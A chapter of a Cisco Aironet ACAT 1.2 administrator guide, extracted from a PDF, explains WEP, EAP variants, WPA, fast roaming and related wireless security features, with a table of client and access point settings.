C H A P T E R
5
Security Features
This chapter describes the security features. The following topics are covered in the chapter.
•
Overview, page 5-2
•
Static WEP Keys, page 5-2
•
EAP (with Static or Dynamic WEP Keys), page 5-2
•
Additional WEP Key Security Features, page 5-7
•
Synchronizing Security Features, page 5-8
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-1
Chapter 5
Security Features
Overview
Overview
You can protect your data as it is transmitted through your wireless network by encrypting it with Wired
Equivalent Privacy (WEP) encryption keys. With WEP encryption, the transmitting device encrypts each
packet with a WEP key, and the receiving device uses that same key to decrypt each packet.
The WEP keys used to encrypt and decrypt transmitted data can be statically associated with your
adapter or dynamically created as part of the EAP authentication process. The information in the “Static
WEP Keys” and “EAP (with Static or Dynamic WEP Keys)” sections below can help you to decide
which type of WEP keys to use. Dynamic WEP keys with EAP offer a higher degree of security than
static WEP keys.
WEP keys, whether static or dynamic, are either 40 or 128 bits long. 128-bit WEP keys offer a greater
level of security than 40-bit WEP keys.
Note
Refer to the “Additional WEP Key Security Features” section on page 5-7 for information on three
security features that can make your WEP keys even more secure.
Static WEP Keys
Each device (or profile) within your wireless network can be assigned up to four static WEP keys. If a
device receives a packet that is not encrypted with the appropriate key (as the WEP keys of all devices
that are to communicate with each other must match), the device discards the packet and never delivers
it to the intended receiver.
Static WEP keys are write-only and temporary; therefore, they cannot be read back from the client
adapter, and they are lost when power to the adapter is removed or the Windows device is rebooted.
Although the keys are temporary, you do not need to re-enter them each time the client adapter is inserted
or the Windows device is rebooted because the keys are stored (in an encrypted format for security
reasons) in the registry of the Windows device. When the driver loads and reads the client adapter’s
registry parameters, it also finds the static WEP keys, unencrypts them, and stores them in volatile
memory on the adapter.
The Security Tab window enables you to view the current WEP key settings for the client adapter and
then to assign new WEP keys or overwrite existing WEP keys as well as to enable or disable static WEP.
Refer to the “Entering a New Static WEP Key” section on page 4-14 or “Disabling Static WEP” section
on page 4-15 for instructions.
EAP (with Static or Dynamic WEP Keys)
The new standard for wireless LAN security, as defined by the IEEE, is called 802.1X for 802.11, or
simply 802.1X. An access point that supports 802.1X and its protocol, Extensible Authentication
Protocol (EAP), acts as the interface between a wireless client and an authentication server such as a
RADIUS server, to which the access point communicates over the wired network.
Two 802.1X authentication types can be selected in ACAT for use with Windows operating systems:
•
EAP-Cisco Wireless (or LEAP)—This authentication type is available for Windows 95, 98, NT,
2000, Me, and XP, as well as non-Windows systems. Support for LEAP is provided not in the
Windows operating system but in your client adapter’s firmware and the Cisco software that
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
5-2
OL-3570-02
Chapter 5
Security Features
EAP (with Static or Dynamic WEP Keys)
supports it. RADIUS servers that support LEAP include Cisco Secure ACS release 2.6 and greater,
Cisco Access Registrar release 1.7 and greater, and Funk Software’s Steel-Belted RADIUS release
3.0 and greater.
LEAP can be enabled or disabled for a specific profile through ACAT. When enabled, a variety of
configuration options are available, including how and when a username and password are entered
to begin the authentication process.
The username and password are used by the client adapter to perform mutual authentication with the
RADIUS server through the access point. The username and password are stored in the client adapter’s
volatile memory; therefore, they are temporary and need to be re-entered whenever power is removed
from the adapter, typically because of the client adapter being ejected or the system powering down.
•
Host Based EAP—Selecting this option enables you to use any 802.1X authentication type for
which your operating system has support. For example, if your operating system uses the 802.1X
supplicant, it provides native support for EAP-TLS authentication and general support for PEAP and
EAP-SIM authentication.
Note
To use EAP-TLS, PEAP, or EAP-SIM you must install the Microsoft 802.1X supplicant and
the PEAP or EAP-SIM security module; configure your client adapter using ACAT or the
ACU; enable the authentication type in Windows; and enable Network-EAP on the access
point.
– EAP-TLS—EAP-TLS is enabled or disabled through the operating system and uses a dynamic
session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt
data. Once enabled, a few configuration parameters must be set within the operating system.
RADIUS servers that support EAP-TLS include Cisco Secure ACS release 3.0 or greater and
Cisco Access Registrar release 1.8 or greater.
Note
EAP-TLS requires the use of a certificate. Refer to Microsoft’s documentation for
information on downloading and installing the certificate.
– Protected EAP (or PEAP)—PEAP authentication is designed to support One-Time Password
(OTP), Windows NT or 2000 domain, and LDAP user databases over a wireless LAN. It is based
on EAP-TLS authentication but uses a password or PIN instead of a client certificate for
authentication. PEAP is enabled or disabled through the operating system and uses a dynamic
session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt
data. If your network uses an OTP user database, PEAP requires you to enter either a hardware
token password or a software token PIN to start the EAP authentication process and gain access
to the network. If your network uses a Windows NT or 2000 domain user database or an LDAP
user database (such as NDS), PEAP requires you to enter your username, password, and domain
name in order to start the authentication process.
RADIUS servers that support PEAP authentication include Cisco Secure ACS release 3.1 or
greater and Cisco Access registrar release 3.5 or greater.
Note
Service Pack 1 for Windows XP and the Microsoft 802.1X supplicant for
Windows 2000 include Microsoft’s PEAP supplicant, which supports a Windows
username and password only and does not operate with Cisco’s PEAP supplicant. To use
Cisco’s PEAP supplicant, install the Install Wizard file after Service Pack 1 for
Windows XP or the Microsoft’s 802.1X supplicant for Windows 2000. Otherwise,
Cisco’s PEAP is overwritten by Microsoft’s PEAP supplicant.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-3
Chapter 5
Security Features
EAP (with Static or Dynamic WEP Keys)
– EAP-SIM—EAP-SIM authentication is designed for use in public wireless LANs and requires
clients equipped with PCSC-compliant smartcard readers. The EAP-SIM supplicant included in
the Install Wizard file supports only Gemplus SIM+ cards; however, an updated supplicant is
available that supports standard GSM-SIM cards as well as more recent versions of the
EAP-SIM protocol. The new supplicant is available for download from the ftpeng FTP server
at the following URL:
ftp://ftpeng.cisco.com/ftp/pwlan/eapsim/CiscoEapSim.dll
Please note that the above requirements are necessary but not sufficient to successfully perform
EAP-SIM authentication. Typically, you are also required to enter into a service contract with
a WLAN service provider, who must support EAP-SIM authentication in its network. Also,
while your PCSC smartcard reader may be able to read standard GSM-SIM cards or chips,
EAP-SIM authentication usually requires your GSM cell phone account to be provisioned for
WLAN service by your service provider.
EAP-SIM is enabled or disabled through the operating system and uses a dynamic session-based
WEP key, which is derived from the client adapter and RADIUS server, to encrypt data.
EAP-SIM requires you to enter a user verification code, or PIN, for communication with the
SIM card. You can choose to have the PIN stored in your computer or to be prompted to enter
it after a reboot or prior to every authentication attempt.
RADIUS servers that support EAP-SIM include Cisco Access Registrar release 3.0 or greater.
Note
Because EAP-TLS, PEAP, and EAP-SIM authentication are enabled in the operating system
and not in ACU, you cannot switch between these authentication types simply by switching
profiles in ACU. You can create a profile in ACU that uses host-based EAP, but you must
enable the specific authentication type in Windows (provided Windows uses the Microsoft
802.1X supplicant). In addition, Windows can be set for only one authentication type at a
time; therefore, if you have more than one profile in ACU that uses host-based EAP and you
want to use another authentication type, you must change authentication types in Windows
after switching profiles in ACU.
When you enable Network-EAP or Require EAP on your access point and configure your client adapter
for LEAP, EAP-TLS, PEAP, or EAP-SIM, authentication to the network occurs in the following
sequence:
1.
The client associates to an access point and begins the authentication process.
Note
The client does not gain full access to the network until authentication between the client
and the RADIUS server is successful.
2.
Communicating through the access point, the client and RADIUS server complete the authentication
process, with the password (LEAP and PEAP), certificate (EAP-TLS), or internal key stored on the
SIM card and in the service provider’s Authentication Center (EAP-SIM) being the shared secret for
authentication. The password, certificate, or internal key is never transmitted during the process.
3.
If authentication is successful, the client and RADIUS server derive a dynamic, session-based WEP
key that is unique to the client.
4.
The RADIUS server transmits the key to the access point using a secure channel on the wired LAN.
5.
For the length of a session, or time period, the access point and the client use this key to encrypt or
decrypt all unicast packets (and broadcast packets if the access point is set up to do so) that travel
between them.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
5-4
OL-3570-02
Chapter 5
Security Features
Wi-Fi Protected Access (WPA)
Refer to the “Enabling LEAP” section on page 4-15 for instructions on enabling LEAP or to the
“Enabling Host-Based EAP” section on page 4-19 for instructions on enabling EAP-TLS, PEAP, or
EAP-SIM.
Refer to the IEEE 802.11 standard for more information on 802.1X authentication and to the following
URL for additional information on RADIUS servers:
http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/secur_c/scprt2/scrad.htm
Wi-Fi Protected Access (WPA)
Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly
increases the level of data protection and access control for existing and future wireless LAN systems.
It is derived from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA
leverages Temporal Key Integrity Protocol (TKIP) for data protection and 802.1X for authenticated key
management.
WPA supports two mutually exclusive key management types: WPA and WPA-Pre-shared key
(WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each
other using an EAP authentication method, and the client and server generate a pairwise master key
(PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using
WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that
pre-shared key is used as the PMK.
Note
Only 350 series and CB20A cards that are installed on computers running Windows 2000 or XP and
running LEAP or host-based EAP authentication can be used with WPA.
Support for WPA is available in Install Wizard version 1.2 or greater. However, if you want to use
host-based EAP authentication with WPA, you must also install a host supplicant with WPA support.
The following host supplicants are recommended for use with Cisco Aironet client adapters:
•
Funk Odyssey Client supplicant release 2.2 (for Windows 2000)
•
Windows XP Service Pack 1 and Microsoft supplicant Q815485 (for Windows XP)
Refer to the “Enabling LEAP” section on page 4-15 for instructions on enabling LEAP with WPA or to
the “Enabling Host-Based EAP” section on page 4-19 for instructions on enabling EAP-TLS, PEAP, or
EAP-SIM with WPA.
WPA must also be enabled on the access point. Access points must use Cisco IOS Release 12.2(11)JA
or greater to enable WPA. Refer to the documentation for your access point for instructions on enabling
this feature.
Fast Roaming (CCKM)
Some applications that run on a client device may require fast roaming between access points. For
example, voice applications require seamless roaming to prevent delays and gaps in conversation.
Support for fast roaming is available for LEAP-enabled clients in Install Wizard version 1.1 or later.
During normal operation, LEAP-enabled clients mutually authenticate with a new access point by
performing a complete LEAP authentication, including communication with the main RADIUS server.
However, when you configure your wireless LAN for fast roaming, LEAP-enabled clients securely roam
from one access point to another without the need to reauthenticate with the RADIUS server. Using
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-5
Chapter 5
Security Features
Fast Roaming (CCKM)
Cisco Centralized Key Management (CCKM), an access point that is configured for wireless domain
services (WDS) uses a fast rekeying technique that enables client devices to roam from one access point
to another in under 150 milliseconds (ms). Fast roaming ensures that there is no perceptible delay in
time-sensitive applications such as wireless Voice over IP (VoIP), enterprise resource planning (ERP),
or Citrix-based solutions.
This feature is enabled on the client adapter in two different ways, depending on the software installed:
•
If you are using client adapter firmware version 5.30.xx (which is included in Install Wizard version
1.2), you need to enable fast roaming in ACAT or Aironet Client Utility (ACU) version 6.2. Refer
to Step 11 in the “Enabling LEAP” section on page 4-15 for details.
•
If you are using client adapter firmware version 5.20.17 (which is included in Install Wizard version
1.1), fast roaming is supported automatically.
Regardless of how fast roaming is enabled on the client adapter, it must also be enabled on the access
point.
Note
Access points must use Cisco IOS Release 12.2(11)JA or greater to enable fast roaming. Refer to the
documentation for your access point for instructions on enabling this feature.
Note
If the Microsoft 802.1X supplicant is installed on your computer, you must disable one or two Windows
parameters in order for this feature to operate correctly. Refer to Step 13 in the “Enabling LEAP” section
for details.
Reporting Access Points that Fail LEAP Authentication
Client adapter firmware version 5.02.20 or greater and the following access point software releases
support a feature that is designed to detect access points that fail LEAP authentication:
•
VxWorks release 12.00T or greater (340, 350, and 1200 series access points)
•
Cisco IOS Release 12.2(4)JA or greater (1100 series access points)
An access point running one of these software releases records a message in the system log when a client
running firmware version 5.02.20 or greater discovers and reports another access point in the wireless
network that has failed LEAP authentication.
The process takes place as follows:
1.
A client with a LEAP profile attempts to associate to access point A.
2.
Access point A does not handle LEAP authentication successfully, perhaps because the access point
does not understand LEAP or cannot communicate to a trusted LEAP authentication server.
3.
The client records the MAC address for access point A and the reason why the association failed.
4.
The client associates successfully to access point B.
5.
The client sends the MAC address of access point A and the reason code for the failure to access
point B.
6.
Access point B logs the failure in the system log.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
5-6
OL-3570-02
Chapter 5
Security Features
Additional WEP Key Security Features
Note
This feature does not need to be enabled on the client adapter or access point; it is automatically
supported automatically in both devices. However, the client adapters and access points must use the
firmware versions or software releases shown above (or greater).
Additional WEP Key Security Features
The three security features discussed in this section (MIC, TKIP, and broadcast key rotation) are
designed to prevent sophisticated attacks on your wireless network’s WEP keys. These features do not
need to be enabled on the client adapter; they are supported automatically in the firmware and driver
versions included in the Install Wizard file. However, they must be enabled on the access point.
For instructions on enabling these security features on your access point, refer to the corresponding
software configuration guide or the installation and configuration guide available at the following URL:
http://www.cisco.com/univercd/cc/td/doc/product/wireless/index.htm.
Note
The 340 or 350 series access points require VxWorks 11.10T or greater to enable these security features.
Refer to the documentation for your access point for instructions on enabling these security features.
Message Integrity Check (MIC)
MIC prevents bit-flip attacks on encrypted packets. During a bit-flip attack, an intruder intercepts an
encrypted message, alters it slightly, and retransmits it, and the receiver accepts the retransmitted
message as legitimate. The MIC adds a few bytes to each packet to make the packets tamper-proof.
The Status window indicates if MIC is being used, and the Statistics window provides MIC statistics.
Note
If you enable MIC on the access point, your client adapter’s driver must support these features;
otherwise, the client cannot associate.
Temporal Key Integrity Protocol (TKIP)
This feature, also referred to as WEP key hashing, defends against an attack on WEP in which the
intruder uses the initialization vector (IV) in encrypted packets to calculate the WEP key. TKIP removes
the predictability that an intruder relies on to determine the WEP key by exploiting IVs. It protects both
unicast and broadcast WEP keys.
Note
If you enable TKIP on the access point, your client adapter’s firmware must support these features;
otherwise, the client cannot associate.
Note
TKIP is automatically enabled whenever WPA is enabled and disabled whenever WP A is disabled.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-7
Chapter 5
Security Features
Synchronizing Security Features
Broadcast Key Rotation
EAP authentication provides dynamic unicast WEP keys for client devices but uses static broadcast, or
multicast, keys. When you enable broadcast WEP key rotation, the access point provides a dynamic
broadcast WEP key and changes it at the interval you select. When you enable this feature, only wireless
client devices using LEAP, EAP-TLS, PEAP, or EAP-SIM authentication can associate to the access
point. Client devices using static WEP (with open or shared key authentication) cannot associate.
Synchronizing Security Features
In order to use any of the security features discussed in this section, both your client adapter and the
access point to which it associates must be set appropriately. Table 5-1 indicates the client and access
point settings required for each security feature. Refer to Chapter 2, “Installed Components Tab,” and
the “Security Tab” section on page 4-10 for installation and configuration instructions for your client
adapter’s security features. Refer to the documentation for your access point for instructions on enabling
any of these features for your access point.
Table 5-1
Client and Access Point Security Settings
Security Feature
Client Setting
Access Point Setting
Static WEP with open
authentication
Enable Static WEP and Open
Access Point Authentication and
create a WEP key.
Set up and enable WEP and enable
Open Authentication for the SSID.
Static WEP with shared key Enable Static WEP and Shared
authentication
Key Access Point Authentication
and create a WEP key.
Set up and enable WEP and enable
Shared Key Authentication for the
SSID.
LEAP authentication
Install LEAP security module and Set up and enable WEP and enable
enable LEAP.
EAP for the SSID.
LEAP authentication with
WPA
Install LEAP security module.
Enable WPA and LEAP.
Note
Select a cipher suite, set up; and
enable WEP, and enable EAP and
WPA for the SSID.
To enable the client
adapter to associate to both Note
WPA and non-WPA access
points, enable Allow
Association to both WPA
and non-WPA
authenticators.
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
EAP-TLS authentication
Set up and enable WEP and enable
If using ACAT or ACU Enable Host Based EAP and
to configure client
Dynamic WEP in ACAT or ACU EAP and Open Authentication for
the SSID.
adapter
and in Windows, select Enable
network access control using IEEE
802.1X and Certificates (or Smart
Card or other Certificate) as the
EAP Type.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
5-8
OL-3570-02
Chapter 5
Security Features
Synchronizing Security Features
Table 5-1
Client and Access Point Security Settings (continued)
Security Feature
If using Windows XP
to configure client
adapter
Client Setting
Access Point Setting
Set up and enable WEP and enable
In Windows, select Enable
network access control using IEEE EAP and Open Authentication for
the SSID.
802.1X and Smart Card or other
Certificate as the EAP Type.
EAP-TLS authentication with WPA
If using ACAT or ACU Enable WPA, Host Based EAP and
to configure client
Dynamic WEP in ACAT or ACU
adapter
and in Windows, enable WPA or
WPA-PSK and select Enable
network access control using IEEE
802.1X and Certificates (or Smart
Card or other Certificate) as the
EAP Type.
If using Windows XP
to configure client
adapter
In Windows, enable WPA or
WPA-PSK and select Enable
network access control using IEEE
802.1X and Smart Card or other
Certificate as the EAP Type.
Select a cipher suite; set up and
enable WEP; and enable EAP, Open
Authentication, and WPA for the
SSID.
Note
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
Select a cipher suite; set up and
enable WEP; and enable EAP, Open
Authentication, and WPA for the
SSID.
Note
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
PEAP authentication
Set up and enable WEP and enable
If using ACAT or ACU Install PEAP security module.
EAP and Open Authentication for
to configure client
Enable Host Based EAP and
adapter
Dynamic WEP in ACAT or ACU the SSID.
and in Windows, select Enable
network access control using IEEE
802.1X and PEAP as the EAP
Type.
If using Windows XP
to configure client
adapter
Set up and enable WEP and enable
In Windows, select Enable
network access control using IEEE EAP and Open Authentication for
the SSID.
802.1X and PEAP as the EAP
Type.
PEAP authentication with WPA
If using ACAT or ACU Enable WPA, Host Based EAP and
to configure client
Dynamic WEP in ACAT or ACU
adapter
and in Windows, enable WPA or
WPA-PSK and select Enable
network access control using IEEE
802.1X and PEAP as the EAP
Type.
Select a cipher suite; set up and
enable WEP; and enable EAP and
Open Authentication, and WPA for
the SSID.
Note
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-9
Chapter 5
Security Features
Synchronizing Security Features
Table 5-1
Client and Access Point Security Settings (continued)
Security Feature
If using Windows XP
to configure client
adapter
Client Setting
Access Point Setting
In Windows, enable WPA or
WPA-PSK and select Enable
network access control using IEEE
802.1X and PEAP as the EAP
Type.
Select a cipher suite; set up and
enable WEP; and enable EAP and
Open Authentication, and WPA for
the SSID.
Note
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
EAP-SIM authentication
If using ACAT or ACU Install EAP-SIM security module. Set up and enable WEP and enable
EAP and Open Authentication for
to configure client
Enable Host Based EAP and
adapter
Dynamic WEP in ACAT or ACU the SSID.
and in Windows, select Enable
network access control using IEEE
802.1X (or Enable IEEE 802.1X
authentication for the network)
and SIM Authentication as the
EAP Type.
If using Windows XP
to configure client
adapter
Set up and enable WEP and enable
In Windows, select Enable
network access control using IEEE EAP and Open Authentication for
802.1X and SIM Authentication as the SSID.
the EAP Type.
EAP-SIM authentication with WPA
If using ACAT or ACU Install EAP-SIM security module.
Enable WPA, Host Based EAP and
to configure client
Dynamic WEP in ACAT or ACU
adapter
and in Windows, enable WPA or
WPA-PSK and select Enable
network access control using IEEE
802.1X (or Enable IEEE 802.1X
authentication for the network)
and SIM Authentication as the
EAP Type.
If using Windows XP
to configure client
adapter
In Windows, enable WPA or
WPA-PSK and select Enable
network access control using IEEE
802.1X and SIM Authentication as
the EAP Type.
Select a cipher suite; set up and
enable WEP; and enable EAP, Open
Authentication, and WPA for the
SSID.
Note
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
Select a cipher suite; set up and
enable WEP; and enable EAP, Open
Authentication, and WPA for the
SSID.
Note
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
5-10
OL-3570-02
Chapter 5
Security Features
Synchronizing Security Features
Table 5-1
Client and Access Point Security Settings (continued)
Security Feature
Client Setting
Access Point Setting
Fast roaming (CCKM)
Enable LEAP and select Allow
Fast Roaming (CCKM)
Use Cisco IOS Release 12.2(11)JA
or greater, select a cipher suite, and
enable EAP and CCKM for the
SSID.
Note
Reporting access points
that fail LEAP
authentication
To enable both WPA and
non-WPA client adapters to
use the SSID, enable
optional WPA.
No settings required;
No settings required; automatically
automatically enabled in firmware enabled in the following software
version 5.02.20 or greater.
releases:
•
VxWorks release 12.00T or
greater (340, 350, and 1200
series access points)
•
Cisco IOS Release 12.2(4)JA or
greater
MIC
No settings required;
automatically enabled by the
firmware included in the Install
Wizard file.
Set up and enable WEP with full
encryption, set MIC to MMH, and
set Use Aironet Extensions to Yes.
TKIP
No settings required;
automatically enabled by the
firmware included in the Install
Wizard file.
Set up and enable WEP, set TKIP to
Cisco, and set Use Aironet
Extensions to Yes.
Broadcast key rotation
Enable LEAP, EAP-TLS, PEAP or Set up and enable WEP and set
EAT-SIM and use the firmware
Broadcast WEP Key Rotation
included in the Install Wizard file. Interval to any value other than zero
(0).
Reporting access points
that fail LEAP
authentication
No settings required; automatically
No settings required;
automatically enabled in firmware enabled in the following software
version 5.02.17 or greater.
releases:
Fast secure roaming
Enable LEAP and use firmware
version 5.20.17 or greater.
•
VxWorks release12.00T or
greater (340, 350, and 1200
series access points)
•
Cisco IOS Release 12.2(4)JA or
greater
Use Cisco IOS Release 12.2(11)JA
or greater, select a cipher suite, and
enable open authentication with
EAP or CCKM.
Note
To enable both 802.1X
clients and non 802.1X
clients to use the SSID,
enable optional CCKM.
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-11
Chapter 5
Security Features
Synchronizing Security Features
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
5-12
OL-3570-02